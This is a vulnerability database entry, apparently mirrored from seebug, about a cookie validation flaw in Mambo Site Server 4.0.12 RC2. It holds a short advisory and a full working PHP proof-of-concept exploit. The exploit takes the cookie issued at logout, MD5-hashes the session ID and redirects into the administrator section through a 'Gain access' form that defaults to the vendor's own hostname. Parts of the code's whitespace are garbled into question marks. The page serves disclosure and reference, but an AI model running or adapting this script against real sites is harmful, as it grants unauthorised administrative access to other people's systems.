Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mambo Site Server 4.0.12 RC2 Cookie Validation Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 17 Views

Mambo Site Server 4.0.12 RC2 Cookie Validation Vulnerability allows unauthorized access using manipulated cookies

Code

                                                source: http://www.securityfocus.com/bid/6926/info

Mambo Site Server may grant access without sufficiently validating cookie based authentication credentials. It has been reported that Mambo will accept a user cookie sent by the site as an administrative credential. To exploit this issue, the attacker must receive a cookie (such as the one issued during logout) and then use MD5 to encode their session ID in the cookie. The attacker may then access administrative pages using this cookie.

This issue was reported in Mambo Site Server 4.0.12 RC2. Earlier versions may also be affected. 

<?php 
/* 
???mamboexp.php - Mambo 4.0.12 RC2 exploit - Proof of concept 
???Copyright (C) 2003??Simen Bergo ([email protected]) 
???This program is free software; you can redistribute it and/or 
???modify it under the terms of the GNU General Public License 
???as published by the Free Software Foundation; either version 2 of 
???the License or (at your option) any later version. 
???This program is distributed in the hope that it will be 
???useful, but WITHOUT ANY WARRANTY; without even the implied warranty 
???of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.??See the 
???GNU General Public License for more details. 
???You should have received a copy of the GNU General Public License 
???along with this program; if not, write to the Free Software 
???Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA??02111-1307, USA. 
*/ 
/* 
???The problem is that Mambo Site Server does not check whether or not 
???the sessionid is created by the administrator login, or any other 
???part of the website. 
???This program will first connect to /index.php?option=logout which 
???hands us a cookie. Then we will md5() encrypt this cookie and "login" 
???at the administrator section. 
*/ 
???? 
????# Check if form was submitted 
????if (isset ($_POST['submit'])) { 
????????# Connect to server 
????????$handle = fsockopen ($_POST['hostname'], 80, &$errno, &$errstr); 
????????# Halt processing if we we're unable to connect 
????????if (!$handle) { die ("Unable to connect to <b>$hostname</b>"); } 
????????else { 
????????????# Get the webpage which will give us the cookie 
????????????fputs ($handle, "GET /" . trim($_POST['maindir'], "\x5c \x2f") . "/index.php?option=logout HTTP/1.0\nHost: 
{$_POST['hostname']}\n\n"); 
????????????# Loop through the contents 
????????????$buffer = ""; 
????????????while (!feof ($handle)) { 
????????????????$buffer .= fgets ($handle, 2000); 
????????????} 
????????????# Create an array with each line as a seperate value 
????????????$arr = explode ("\n", $buffer); 
????????????# Loop through the array looking for the cookie 
????????????foreach ($arr as $value) { 
????????????????# If we have found the cookie, proceed 
????????????????if (eregi ("Set-Cookie: sessioncookie=", $value)) { 
????????????????????# Explode again, to sort out the sessionid 
????????????????????$var = explode ("=", $value); 
????????????????????# Now that we have all the information we need, we can redirect 
????????????????????header ("Location: http://{$_POST['hostname']}/" . 
???????????????????????????? trim($_POST['admdir'], "\x5c \x2f") . "/index2.php?session_id=" . md5(trim($var[1]))); 
????????????????} 
????????????} 
????????} 
????} 
?> 
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST"> 
??<table border="0" cellspacing="0" cellpadding="0"> 
????<tr> 
??????<td width="120" height="30">Hostname</td> 
??????<td width="280" height="30"><input type="text" name="hostname" size="30" value="www.mamboserver.com"/></td> 
????</tr> 
????<tr> 
??????<td width="120" height="30">Main directory</td> 
??????<td width="280" height="30"><input type="text" name="maindir" size="30" value=""/></td> 
????</tr> 
????<tr> 
??????<td width="120" height="30">Admin directory</td> 
??????<td width="280" height="30"><input type="text" name="admdir" size="30" value="administrator"/></td> 
????</tr> 
????<tr> 
??????<td width="120" height="30"></td> 
??????<td width="280" height="30"><input type="submit" value="Gain access" name="submit"/> <input type="reset" 
value="Reset"/></td> 
????</tr> 
??</table> 
</form>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
mambo site servercookie validationvulnerabilityunauthorized accessmanipulated cookies
17